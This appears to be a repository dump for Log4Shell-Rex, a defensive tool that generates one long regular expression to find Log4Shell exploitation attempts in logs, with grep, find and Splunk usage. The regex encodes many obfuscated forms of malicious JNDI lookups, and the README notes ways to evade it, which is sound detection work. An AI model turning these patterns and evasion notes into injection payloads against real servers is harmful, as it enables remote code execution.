:25%?)*(?:53|73|C5%(?:25%?)*BF)|\\u?0*(?:17f|123|577|73|53|163))|(?:h|%(?:25%?)*(?:48|68)|\\u?0*(?:110|68|48|150))(?:[^\n]*?(?:t|%(?:25%?)*(?:54|74)|\\u?0*(?:124|74|54|164))){2}[^\n]*?(?:p|%(?:25%?)*(?:50|70)|\\u?0*(?:70|50|160|120))(?:[^\n]*?(?:[s\x{17f}]|%(?:25%?)*(?:53|73|C5%(?:25%?)*BF)|\\u?0*(?:17f|123|577|73|53|163)))?)[^\n]*?(?:[\x3a]|%(?:25%?)*3a|\\u?0*(?:72|3a))|(?:b|%(?:25%?)*(?:42|62)|\\u?0*(?:102|62|42|142))[^\n]*?(?:a|%(?:25%?)*(?:41|61)|\\u?0*(?:101|61|41|141))[^\n]*?(?:[s\x{17f}]|%(?:25%?)*(?:53|73|C5%(?:25%?)*BF)|\\u?0*(?:17f|123|577|73|53|163))[^\n]*?(?:e|%(?:25%?)*(?:45|65)|\\u?0*(?:45|145|105|65))[^\n]*?(?:[\x3a]|%(?:25%?)*3a|\\u?0*(?:72|3a))(JH[s-v]|[\x2b\x2f-9A-Za-z][CSiy]R7|[\x2b\x2f-9A-Za-z]{2}[048AEIMQUYcgkosw]ke[\x2b\x2f-9w-z]))' 69 | ``` 70 | 71 | ### Combine it with `find` to recursively scan a (sub-)folder of log files 72 | 73 | ```bash 74 | eval "$(./RegEx_Generator.sh)" 75 | find /var/log -name "*.log" | xargs grep -P ${Log4ShellRex} 76 | ``` 77 | 78 | ```bash 79 | find /var/log -name "*.log" | xargs grep -P '(?im)(?:^|[\n]).*?(?:[\x24]|%(?:25%?)*24|\\u?0*(?:44|24))(?:[\x7b]|%(?:25%?)*7b|\\u?0*(?:7b|173))[^\n]*?((?:j|%(?:25%?)*(?:4a|6a)|\\u?0*(?:112|6a|4a|152))[^\n]*?(?:n|%(?:25%?)*(?:4e|6e)|\\u?0*(?:4e|156|116|6e))[^\n]*?(?:d|%(?:25%?)*(?:44|64)|\\u?0*(?:44|144|104|64))[^\n]*?(?:[i\x{130}\x{131}]|%(?:25%?)*(?:49|69|C4%(?:25%?)*B0|C4%(?:25%?)*B1)|\\u?0*(?:111|69|49|151|130|460|131|461))[^\n]*?(?:[\x3a]|%(?:25%?)*3a|\\u?0*(?:72|3a))[^\n]*?((?:l|%(?:25%?)*(?:4c|6c)|\\u?0*(?:154|114|6c|4c))[^\n]*?(?:d|%(?:25%?)*(?:44|64)|\\u?0*(?:44|144|104|64))[^\n]*?(?:a|%(?:25%?)*(?:41|61)|\\u?0*(?:101|61|41|141))[^\n]*?(?:p|%(?:25%?)*(?:50|70)|\\u?0*(?:70|50|160|120))(?:[^\n]*?(?:[s\x{17f}]|%(?:25%?)*(?:53|73|C5%(?:25%?)*BF)|\\u?0*(?:17f|123|577|73|53|163)))?|(?:r|%(?:25%?)*(?:52|72)|\\u?0*(?:122|72|52|162))[^\n]*?(?:m|%(?:25%?)*(?:4d|6d)|\\u?0*(?:4d|155|115|6d))[^\n]*?(?:[i\x{130}\x{131}]|%(?:25%?)*(?:49|69|C4%(?:25%?)*B0|C4%(?:25%?)*B1)|\\u?0*(?:111|69|49|151|130|460|131|461))|(?:d|%(?:25%?)*(?:44|64)|\\u?0*(?:44|144|104|64))[^\n]*?(?:n|%(?:25%?)*(?:4e|6e)|\\u?0*(?:4e|156|116|6e))[^\n]*?(?:[s\x{17f}]|%(?:25%?)*(?:53|73|C5%(?:25%?)*BF)|\\u?0*(?:17f|123|577|73|53|163))|(?:n|%(?:25%?)*(?:4e|6e)|\\u?0*(?:4e|156|116|6e))[^\n]*?(?:[i\x{130}\x{131}]|%(?:25%?)*(?:49|69|C4%(?:25%?)*B0|C4%(?:25%?)*B1)|\\u?0*(?:111|69|49|151|130|460|131|461))[^\n]*?(?:[s\x{17f}]|%(?:25%?)*(?:53|73|C5%(?:25%?)*BF)|\\u?0*(?:17f|123|577|73|53|163))|(?:[^\n]*?(?:[i\x{130}\x{131}]|%(?:25%?)*(?:49|69|C4%(?:25%?)*B0|C4%(?:25%?)*B1)|\\u?0*(?:111|69|49|151|130|460|131|461))){2}[^\n]*?(?:o|%(?:25%?)*(?:4f|6f)|\\u?0*(?:6f|4f|157|117))[^\n]*?(?:p|%(?:25%?)*(?:50|70)|\\u?0*(?:70|50|160|120))|(?:c|%(?:25%?)*(?:43|63)|\\u?0*(?:143|103|63|43))[^\n]*?(?:o|%(?:25%?)*(?:4f|6f)|\\u?0*(?:6f|4f|157|117))[^\n]*?(?:r|%(?:25%?)*(?:52|72)|\\u?0*(?:122|72|52|162))[^\n]*?(?:b|%(?:25%?)*(?:42|62)|\\u?0*(?:102|62|42|142))[^\n]*?(?:a|%(?:25%?)*(?:41|61)|\\u?0*(?:101|61|41|141))|(?:n|%(?:25%?)*(?:4e|6e)|\\u?0*(?:4e|156|116|6e))[^\n]*?(?:d|%(?:25%?)*(?:44|64)|\\u?0*(?:44|144|104|64))[^\n]*?(?:[s\x{17f}]|%(?:25%?)*(?:53|73|C5%(?:25%?)*BF)|\\u?0*(?:17f|123|577|73|53|163))|(?:h|%(?:25%?)*(?:48|68)|\\u?0*(?:110|68|48|150))(?:[^\n]*?(?:t|%(?:25%?)*(?:54|74)|\\u?0*(?:124|74|54|164))){2}[^\n]*?(?:p|%(?:25%?)*(?:50|70)|\\u?0*(?:70|50|160|120))(?:[^\n]*?(?:[s\x{17f}]|%(?:25%?)*(?:53|73|C5%(?:25%?)*BF)|\\u?0*(?:17f|123|577|73|53|163)))?)[^\n]*?(?:[\x3a]|%(?:25%?)*3a|\\u?0*(?:72|3a))|(?:b|%(?:25%?)*(?:42|62)|\\u?0*(?:102|62|42|142))[^\n]*?(?:a|%(?:25%?)*(?:41|61)|\\u?0*(?:101|61|41|141))[^\n]*?(?:[s\x{17f}]|%(?:25%?)*(?:53|73|C5%(?:25%?)*BF)|\\u?0*(?:17f|123|577|73|53|163))[^\n]*?(?:e|%(?:25%?)*(?:45|65)|\\u?0*(?:45|145|105|65))[^\n]*?(?:[\x3a]|%(?:25%?)*3a|\\u?0*(?:72|3a))(JH[s-v]|[\x2b\x2f-9A-Za-z][CSiy]R7|[\x2b\x2f-9A-Za-z]{2}[048AEIMQUYcgkosw]ke[\x2b\x2f-9w-z]))' 80 | ``` 81 | 82 | ## Hunting in your logs using Splunk 83 | 84 | You can use this RegEx to search your indexed logs using the `| regex` 85 | [SPL](https://docs.splunk.com/Documentation/Splunk/latest/SearchReference/Regex) command 86 | 87 | ```spl 88 | index=<...> sourcetype=<...> 89 | | regex "" 90 | ``` 91 | 92 | ```spl 93 | index=<...> sourcetype=<...> 94 | | regex "(?im)(?:^|[\\n]).*?(?:[\\x24]|%(?:25%?)*24|\\\\u?0*(?:44|24))(?:[\\x7b]|%(?:25%?)*7b|\\\\u?0*(?:7b|173))[^\\n]*?((?:j|%(?:25%?)*(?:4a|6a)|\\\\u?0*(?:112|6a|4a|152))[^\\n]*?(?:n|%(?:25%?)*(?:4e|6e)|\\\\u?0*(?:4e|156|116|6e))[^\\n]*?(?:d|%(?:25%?)*(?:44|64)|\\\\u?0*(?:44|144|104|64))[^\\n]*?(?:[i\\x{130}\\x{131}]|%(?:25%?)*(?:49|69|C4%(?:25%?)*B0|C4%(?:25%?)*B1)|\\\\u?0*(?:111|69|49|151|130|460|131|461))[^\\n]*?(?:[\\x3a]|%(?:25%?)*3a|\\\\u?0*(?:72|3a))[^\\n]*?((?:l|%(?:25%?)*(?:4c|6c)|\\\\u?0*(?:154|114|6c|4c))[^\\n]*?(?:d|%(?:25%?)*(?:44|64)|\\\\u?0*(?:44|144|104|64))[^\\n]*?(?:a|%(?:25%?)*(?:41|61)|\\\\u?0*(?:101|61|41|141))[^\\n]*?(?:p|%(?:25%?)*(?:50|70)|\\\\u?0*(?:70|50|160|120))(?:[^\\n]*?(?:[s\\x{17f}]|%(?:25%?)*(?:53|73|C5%(?:25%?)*BF)|\\\\u?0*(?:17f|123|577|73|53|163)))?|(?:r|%(?:25%?)*(?:52|72)|\\\\u?0*(?:122|72|52|162))[^\\n]*?(?:m|%(?:25%?)*(?:4d|6d)|\\\\u?0*(?:4d|155|115|6d))[^\\n]*?(?:[i\\x{130}\\x{131}]|%(?:25%?)*(?:49|69|C4%(?:25%?)*B0|C4%(?:25%?)*B1)|\\\\u?0*(?:111|69|49|151|130|460|131|461))|(?:d|%(?:25%?)*(?:44|64)|\\\\u?0*(?:44|144|104|64))[^\\n]*?(?:n|%(?:25%?)*(?:4e|6e)|\\\\u?0*(?:4e|156|116|6e))[^\\n]*?(?:[s\\x{17f}]|%(?:25%?)*(?:53|73|C5%(?:25%?)*BF)|\\\\u?0*(?:17f|123|577|73|53|163))|(?:n|%(?:25%?)*(?:4e|6e)|\\\\u?0*(?:4e|156|116|6e))[^\\n]*?(?:[i\\x{130}\\x{131}]|%(?:25%?)*(?:49|69|C4%(?:25%?)*B0|C4%(?:25%?)*B1)|\\\\u?0*(?:111|69|49|151|130|460|131|461))[^\\n]*?(?:[s\\x{17f}]|%(?:25%?)*(?:53|73|C5%(?:25%?)*BF)|\\\\u?0*(?:17f|123|577|73|53|163))|(?:[^\\n]*?(?:[i\\x{130}\\x{131}]|%(?:25%?)*(?:49|69|C4%(?:25%?)*B0|C4%(?:25%?)*B1)|\\\\u?0*(?:111|69|49|151|130|460|131|461))){2}[^\\n]*?(?:o|%(?:25%?)*(?:4f|6f)|\\\\u?0*(?:6f|4f|157|117))[^\\n]*?(?:p|%(?:25%?)*(?:50|70)|\\\\u?0*(?:70|50|160|120))|(?:c|%(?:25%?)*(?:43|63)|\\\\u?0*(?:143|103|63|43))[^\\n]*?(?:o|%(?:25%?)*(?:4f|6f)|\\\\u?0*(?:6f|4f|157|117))[^\\n]*?(?:r|%(?:25%?)*(?:52|72)|\\\\u?0*(?:122|72|52|162))[^\\n]*?(?:b|%(?:25%?)*(?:42|62)|\\\\u?0*(?:102|62|42|142))[^\\n]*?(?:a|%(?:25%?)*(?:41|61)|\\\\u?0*(?:101|61|41|141))|(?:n|%(?:25%?)*(?:4e|6e)|\\\\u?0*(?:4e|156|116|6e))[^\\n]*?(?:d|%(?:25%?)*(?:44|64)|\\\\u?0*(?:44|144|104|64))[^\\n]*?(?:[s\\x{17f}]|%(?:25%?)*(?:53|73|C5%(?:25%?)*BF)|\\\\u?0*(?:17f|123|577|73|53|163))|(?:h|%(?:25%?)*(?:48|68)|\\\\u?0*(?:110|68|48|150))(?:[^\\n]*?(?:t|%(?:25%?)*(?:54|74)|\\\\u?0*(?:124|74|54|164))){2}[^\\n]*?(?:p|%(?:25%?)*(?:50|70)|\\\\u?0*(?:70|50|160|120))(?:[^\\n]*?(?:[s\\x{17f}]|%(?:25%?)*(?:53|73|C5%(?:25%?)*BF)|\\\\u?0*(?:17f|123|577|73|53|163)))?)[^\\n]*?(?:[\\x3a]|%(?:25%?)*3a|\\\\u?0*(?:72|3a))|(?:b|%(?:25%?)*(?:42|62)|\\\\u?0*(?:102|62|42|142))[^\\n]*?(?:a|%(?:25%?)*(?:41|61)|\\\\u?0*(?:101|61|41|141))[^\\n]*?(?:[s\\x{17f}]|%(?:25%?)*(?:53|73|C5%(?:25%?)*BF)|\\\\u?0*(?:17f|123|577|73|53|163))[^\\n]*?(?:e|%(?:25%?)*(?:45|65)|\\\\u?0*(?:45|145|105|65))[^\\n]*?(?:[\\x3a]|%(?:25%?)*3a|\\\\u?0*(?:72|3a))(JH[s-v]|[\\x2b\\x2f-9A-Za-z][CSiy]R7|[\\x2b\\x2f-9A-Za-z]{2}[048AEIMQUYcgkosw]ke[\\x2b\\x2f-9w-z]))" 95 | ``` 96 | 97 | ## Screenshot 98 | 99 | **regex101** 100 | ![Example Screenshot regex101](screenshots/example_4a.png) 101 | 102 | **grep -P** 103 | ![Example Screenshot Shell](screenshots/example_4b.png) 104 | 105 | **Splunk** 106 | ![Example Screenshot Splunk](screenshots/example_4c.jpeg) 107 | 108 | **Graphical representation of the RegEx** 109 | ![Example Screenshot Splunk](screenshots/viz_4.png) 110 | (Created using regexper tool from Jeff Avallone, licensed under 111 | [CC BY license](https://creativecommons.org/licenses/by/3.0/).) 112 | 113 | ## Other 114 | 115 | **Please create a pull request / issue if you can provide syntax for more systems.** 116 | 117 | ## Credits 118 | 119 | I got help and ideas from: 120 | 121 | - [@cyberops](https://twitter.com/cyb3rops) building [log4shell-detector](https://github.com/Neo23x0/log4shell-detector/) that served as an inspiration 122 | - [@karanlyons](https://github.com/karanlyons) providing corpus to test against 123 | -------------------------------------------------------------------------------- /README.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # _ _ _ ____ _ _ _ ____ 4 | # | | ___ __ _| || |/ ___|| |__ ___| | | | _ \ _____ __ 5 | # | | / _ \ / _` | || |\___ \| '_ \ / _ \ | |_____| |_) / _ \ \/ / 6 | # | |__| (_) | (_| |__ _|__) | | | | __/ | |_____| _ < __/> < 7 | # |_____\___/ \__, | |_||____/|_| |_|\___|_|_| |_| \_\___/_/\_\ 8 | # |___/ 9 | # 10 | # 2021-12-13 back2root https://github.com/back2root 11 | 12 | eval "$(./RegEx_Generator.sh "${1}")" 13 | 14 | echo "Documentation printed in Markdown format to stdout" >&2 15 | echo "Use \`./README.sh > README.md\` to update README.md" >&2 16 | 17 | # shellcheck disable=SC2154 18 | cat << EOF 19 | # Log4Shell-Rex 20 | 21 | The following RegEx was written in an attempt to match indicators of a Log4Shell (CVE-2021-44228 and 22 | CVE-2021-45046) exploitation. 23 | 24 | **If you run a version from pre 2021/12/21, it's highly recommended to test and update.**\\ 25 | I've removed some quirks and enhanced performance. 26 | 27 | The Regex aims being PCRE compatible, but should also run on re2 and potentially more RegEx engines. 28 | 29 | **RegEx:** 30 | \`\`\`regex 31 | ${Log4ShellRex} 32 | \`\`\` 33 | 34 | ## Capabilities 35 | 36 | By now, this regex should match the exploit, regardless: 37 | 38 | - Just logged 39 | - Case insensitive (also in all supported encodings) 40 | - URL Encoded 41 | - Recursively URL Encoded 42 | - With Unicode encoding 43 | - With Octal encoding 44 | - Base64 encoded (rudimentary) 45 | 46 | ### Background 47 | 48 | The goal is to have a RegEx that represents a reasonable tradeoff between detecting as many attack 49 | attempts as possible with an acceptable number of false positives. 50 | 51 | The APT attacker will find a way around if necessary, but less elaborate attacks will leave the 52 | warning light on. 53 | 54 | Why a (single) RegEx: Because it can be easily executed on the CLI or in a SIEM without any 55 | additional tools. If tools can be executed, do it, they exist. 56 | 57 | The length of the regex is less of a problem than its performance. Despite the length, the RegEx 58 | should be acceptably fast to execute on average log data. 59 | 60 | ### Call for action 61 | 62 | I wanna make it hard to hide an attack in real world szenarios. 63 | 64 | If this RegEx does not match sth. you have seen in the wild or can show being exploitable, please 65 | create an issue. 66 | 67 | It is known, that you can work around the RegEx easily by encoding different parts of the attack 68 | pattern using Base64. How ever, this is accepted, as \`base64\` did not finaly made it into an 69 | official Log4j release yet. ([LOG4J2-2446](https://issues.apache.org/jira/projects/LOG4J2/issues/LOG4J2-2446)) 70 | 71 | ### Tools 72 | 73 | - Test the RegEx: **[regex101](https://regex101.com/r/KqGG3W/24)** 74 | - Visualize the Regex: **[REGEXPER](https://regexper.com/#%28%3F%3A%5E%7C%5B%5Cn%5D%29.*%3F%28%3F%3A%5B%5Cx24%5D%7C%25%28%3F%3A25%25%3F%29*24%7C%5C%5Cu%3F0*%28%3F%3A44%7C24%29%29%28%3F%3A%5B%5Cx7b%5D%7C%25%28%3F%3A25%25%3F%29*7b%7C%5C%5Cu%3F0*%28%3F%3A7b%7C173%29%29%5B%5E%5Cn%5D*%3F%28%28%3F%3Aj%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A4a%7C6a%29%7C%5C%5Cu%3F0*%28%3F%3A112%7C6a%7C4a%7C152%29%29%5B%5E%5Cn%5D*%3F%28%3F%3An%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A4e%7C6e%29%7C%5C%5Cu%3F0*%28%3F%3A4e%7C156%7C116%7C6e%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Ad%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A44%7C64%29%7C%5C%5Cu%3F0*%28%3F%3A44%7C144%7C104%7C64%29%29%5B%5E%5Cn%5D*%3F%28%3F%3A%5Bi%5Cx%7B130%7D%5Cx%7B131%7D%5D%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A49%7C69%7CC4%25%28%3F%3A25%25%3F%29*B0%7CC4%25%28%3F%3A25%25%3F%29*B1%29%7C%5C%5Cu%3F0*%28%3F%3A111%7C69%7C49%7C151%7C130%7C460%7C131%7C461%29%29%5B%5E%5Cn%5D*%3F%28%3F%3A%5B%5Cx3a%5D%7C%25%28%3F%3A25%25%3F%29*3a%7C%5C%5Cu%3F0*%28%3F%3A72%7C3a%29%29%5B%5E%5Cn%5D*%3F%28%28%3F%3Al%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A4c%7C6c%29%7C%5C%5Cu%3F0*%28%3F%3A154%7C114%7C6c%7C4c%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Ad%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A44%7C64%29%7C%5C%5Cu%3F0*%28%3F%3A44%7C144%7C104%7C64%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Aa%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A41%7C61%29%7C%5C%5Cu%3F0*%28%3F%3A101%7C61%7C41%7C141%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Ap%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A50%7C70%29%7C%5C%5Cu%3F0*%28%3F%3A70%7C50%7C160%7C120%29%29%28%3F%3A%5B%5E%5Cn%5D*%3F%28%3F%3A%5Bs%5Cx%7B17f%7D%5D%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A53%7C73%7CC5%25%28%3F%3A25%25%3F%29*BF%29%7C%5C%5Cu%3F0*%28%3F%3A17f%7C123%7C577%7C73%7C53%7C163%29%29%29%3F%7C%28%3F%3Ar%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A52%7C72%29%7C%5C%5Cu%3F0*%28%3F%3A122%7C72%7C52%7C162%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Am%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A4d%7C6d%29%7C%5C%5Cu%3F0*%28%3F%3A4d%7C155%7C115%7C6d%29%29%5B%5E%5Cn%5D*%3F%28%3F%3A%5Bi%5Cx%7B130%7D%5Cx%7B131%7D%5D%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A49%7C69%7CC4%25%28%3F%3A25%25%3F%29*B0%7CC4%25%28%3F%3A25%25%3F%29*B1%29%7C%5C%5Cu%3F0*%28%3F%3A111%7C69%7C49%7C151%7C130%7C460%7C131%7C461%29%29%7C%28%3F%3Ad%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A44%7C64%29%7C%5C%5Cu%3F0*%28%3F%3A44%7C144%7C104%7C64%29%29%5B%5E%5Cn%5D*%3F%28%3F%3An%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A4e%7C6e%29%7C%5C%5Cu%3F0*%28%3F%3A4e%7C156%7C116%7C6e%29%29%5B%5E%5Cn%5D*%3F%28%3F%3A%5Bs%5Cx%7B17f%7D%5D%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A53%7C73%7CC5%25%28%3F%3A25%25%3F%29*BF%29%7C%5C%5Cu%3F0*%28%3F%3A17f%7C123%7C577%7C73%7C53%7C163%29%29%7C%28%3F%3An%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A4e%7C6e%29%7C%5C%5Cu%3F0*%28%3F%3A4e%7C156%7C116%7C6e%29%29%5B%5E%5Cn%5D*%3F%28%3F%3A%5Bi%5Cx%7B130%7D%5Cx%7B131%7D%5D%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A49%7C69%7CC4%25%28%3F%3A25%25%3F%29*B0%7CC4%25%28%3F%3A25%25%3F%29*B1%29%7C%5C%5Cu%3F0*%28%3F%3A111%7C69%7C49%7C151%7C130%7C460%7C131%7C461%29%29%5B%5E%5Cn%5D*%3F%28%3F%3A%5Bs%5Cx%7B17f%7D%5D%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A53%7C73%7CC5%25%28%3F%3A25%25%3F%29*BF%29%7C%5C%5Cu%3F0*%28%3F%3A17f%7C123%7C577%7C73%7C53%7C163%29%29%7C%28%3F%3A%5B%5E%5Cn%5D*%3F%28%3F%3A%5Bi%5Cx%7B130%7D%5Cx%7B131%7D%5D%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A49%7C69%7CC4%25%28%3F%3A25%25%3F%29*B0%7CC4%25%28%3F%3A25%25%3F%29*B1%29%7C%5C%5Cu%3F0*%28%3F%3A111%7C69%7C49%7C151%7C130%7C460%7C131%7C461%29%29%29%7B2%7D%5B%5E%5Cn%5D*%3F%28%3F%3Ao%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A4f%7C6f%29%7C%5C%5Cu%3F0*%28%3F%3A6f%7C4f%7C157%7C117%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Ap%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A50%7C70%29%7C%5C%5Cu%3F0*%28%3F%3A70%7C50%7C160%7C120%29%29%7C%28%3F%3Ac%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A43%7C63%29%7C%5C%5Cu%3F0*%28%3F%3A143%7C103%7C63%7C43%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Ao%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A4f%7C6f%29%7C%5C%5Cu%3F0*%28%3F%3A6f%7C4f%7C157%7C117%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Ar%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A52%7C72%29%7C%5C%5Cu%3F0*%28%3F%3A122%7C72%7C52%7C162%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Ab%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A42%7C62%29%7C%5C%5Cu%3F0*%28%3F%3A102%7C62%7C42%7C142%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Aa%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A41%7C61%29%7C%5C%5Cu%3F0*%28%3F%3A101%7C61%7C41%7C141%29%29%7C%28%3F%3An%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A4e%7C6e%29%7C%5C%5Cu%3F0*%28%3F%3A4e%7C156%7C116%7C6e%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Ad%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A44%7C64%29%7C%5C%5Cu%3F0*%28%3F%3A44%7C144%7C104%7C64%29%29%5B%5E%5Cn%5D*%3F%28%3F%3A%5Bs%5Cx%7B17f%7D%5D%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A53%7C73%7CC5%25%28%3F%3A25%25%3F%29*BF%29%7C%5C%5Cu%3F0*%28%3F%3A17f%7C123%7C577%7C73%7C53%7C163%29%29%7C%28%3F%3Ah%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A48%7C68%29%7C%5C%5Cu%3F0*%28%3F%3A110%7C68%7C48%7C150%29%29%28%3F%3A%5B%5E%5Cn%5D*%3F%28%3F%3At%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A54%7C74%29%7C%5C%5Cu%3F0*%28%3F%3A124%7C74%7C54%7C164%29%29%29%7B2%7D%5B%5E%5Cn%5D*%3F%28%3F%3Ap%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A50%7C70%29%7C%5C%5Cu%3F0*%28%3F%3A70%7C50%7C160%7C120%29%29%28%3F%3A%5B%5E%5Cn%5D*%3F%28%3F%3A%5Bs%5Cx%7B17f%7D%5D%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A53%7C73%7CC5%25%28%3F%3A25%25%3F%29*BF%29%7C%5C%5Cu%3F0*%28%3F%3A17f%7C123%7C577%7C73%7C53%7C163%29%29%29%3F%29%5B%5E%5Cn%5D*%3F%28%3F%3A%5B%5Cx3a%5D%7C%25%28%3F%3A25%25%3F%29*3a%7C%5C%5Cu%3F0*%28%3F%3A72%7C3a%29%29%7C%28%3F%3Ab%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A42%7C62%29%7C%5C%5Cu%3F0*%28%3F%3A102%7C62%7C42%7C142%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Aa%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A41%7C61%29%7C%5C%5Cu%3F0*%28%3F%3A101%7C61%7C41%7C141%29%29%5B%5E%5Cn%5D*%3F%28%3F%3A%5Bs%5Cx%7B17f%7D%5D%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A53%7C73%7CC5%25%28%3F%3A25%25%3F%29*BF%29%7C%5C%5Cu%3F0*%28%3F%3A17f%7C123%7C577%7C73%7C53%7C163%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Ae%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A45%7C65%29%7C%5C%5Cu%3F0*%28%3F%3A45%7C145%7C105%7C65%29%29%5B%5E%5Cn%5D*%3F%28%3F%3A%5B%5Cx3a%5D%7C%25%28%3F%3A25%25%3F%29*3a%7C%5C%5Cu%3F0*%28%3F%3A72%7C3a%29%29%28JH%5Bs-v%5D%7C%5B%5Cx2b%5Cx2f-9A-Za-z%5D%5BCSiy%5DR7%7C%5B%5Cx2b%5Cx2f-9A-Za-z%5D%7B2%7D%5B048AEIMQUYcgkosw%5Dke%5B%5Cx2b%5Cx2f-9w-z%5D%29%29)** 75 | 76 | ## Hunting on your Linux machine 77 | 78 | ### On the CLI with \`grep\` 79 | 80 | \`\`\`bash 81 | eval "\$(./RegEx_Generator.sh)" 82 | grep -P \${Log4ShellRex} 83 | \`\`\` 84 | 85 | \`\`\`bash 86 | grep -P '${Log4ShellRex}' 87 | \`\`\` 88 | 89 | ### Combine it with \`find\` to recursively scan a (sub-)folder of log files 90 | 91 | \`\`\`bash 92 | eval "\$(./RegEx_Generator.sh)" 93 | find /var/log -name "*.log" | xargs grep -P \${Log4ShellRex} 94 | \`\`\` 95 | 96 | \`\`\`bash 97 | find /var/log -name "*.log" | xargs grep -P '${Log4ShellRex}' 98 | \`\`\` 99 | 100 | ## Hunting in your logs using Splunk 101 | 102 | You can use this RegEx to search your indexed logs using the \`| regex\` 103 | [SPL](https://docs.splunk.com/Documentation/Splunk/latest/SearchReference/Regex) command 104 | 105 | \`\`\`spl 106 | index=<...> sourcetype=<...> 107 | | regex "" 108 | \`\`\` 109 | 110 | \`\`\`spl 111 | index=<...> sourcetype=<...> 112 | | regex "${Log4ShellRex//\\/\\\\}" 113 | \`\`\` 114 | 115 | ## Screenshot 116 | 117 | **regex101** 118 | ![Example Screenshot regex101](screenshots/example_4a.png) 119 | 120 | **grep -P** 121 | ![Example Screenshot Shell](screenshots/example_4b.png) 122 | 123 | **Splunk** 124 | ![Example Screenshot Splunk](screenshots/example_4c.jpeg) 125 | 126 | **Graphical representation of the RegEx** 127 | ![Example Screenshot Splunk](screenshots/viz_4.png) 128 | (Created using regexper tool from Jeff Avallone, licensed under 129 | [CC BY license](https://creativecommons.org/licenses/by/3.0/).) 130 | 131 | ## Other 132 | 133 | **Please create a pull request / issue if you can provide syntax for more systems.** 134 | 135 | ## Credits 136 | 137 | I got help and ideas from: 138 | 139 | - [@cyberops](https://twitter.com/cyb3rops) building [log4shell-detector](https://github.com/Neo23x0/log4shell-detector/) that served as an inspiration 140 | - [@karanlyons](https://github.com/karanlyons) providing corpus to test against 141 | EOF 142 | -------------------------------------------------------------------------------- /RegEx_Generator.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | set -e 3 | 4 | # _ _ _ ____ _ _ _ ____ 5 | # | | ___ __ _| || |/ ___|| |__ ___| | | | _ \ _____ __ 6 | # | | / _ \ / _` | || |\___ \| '_ \ / _ \ | |_____| |_) / _ \ \/ / 7 | # | |__| (_) | (_| |__ _|__) | | | | __/ | |_____| _ < __/> < 8 | # |_____\___/ \__, | |_||____/|_| |_|\___|_|_| |_| \_\___/_/\_\ 9 | # |___/ 10 | # 11 | # 2021-12-13 @back2root 12 | 13 | base64 -d <<< "IF8gICAgICAgICAgICAgICAgXyAgXyAgX19fXyAgXyAgICAgICAgICBfIF8gICAgICAgX19fXwp8IHwgICAgX19fICAgX18gX3wgfHwgfC8gX19ffHwgfF9fICAgX19ffCB8IHwgICAgIHwgIF8gXCBfX19fXyAgX18KfCB8ICAgLyBfIFwgLyBfYCB8IHx8IHxcX19fIFx8ICdfIFwgLyBfIFwgfCB8X19fX198IHxfKSAvIF8gXCBcLyAvCnwgfF9ffCAoXykgfCAoX3wgfF9fICAgX3xfXykgfCB8IHwgfCAgX18vIHwgfF9fX19ffCAgXyA8ICBfXy8+ICA8CnxfX19fX1xfX18vIFxfXywgfCAgfF98fF9fX18vfF98IHxffFxfX198X3xffCAgICAgfF98IFxfXF9fXy9fL1xfXAogICAgICAgICAgICB8X19fLwoK" >&2 14 | 15 | # Build Alphabet if requested 16 | if [ "${1}" == "-buildAlphabet" ]; then 17 | javac=$(command -v javac) || exit 1 18 | java=$(command -v java) || exit 1 19 | 20 | ${javac} Alphabet.java 21 | ${java} "Alphabet" > Alphabet 22 | fi 23 | 24 | sp='[^\n]*?' 25 | source "Alphabet" 26 | 27 | # String groups 28 | jndi="${j}${sp}${n}${sp}${d}${sp}${i}" 29 | 30 | ldaps="${l}${sp}${d}${sp}${a}${sp}${p}(?:${sp}${s})?" 31 | rmi="${r}${sp}${m}${sp}${i}" 32 | dns="${d}${sp}${n}${sp}${s}" 33 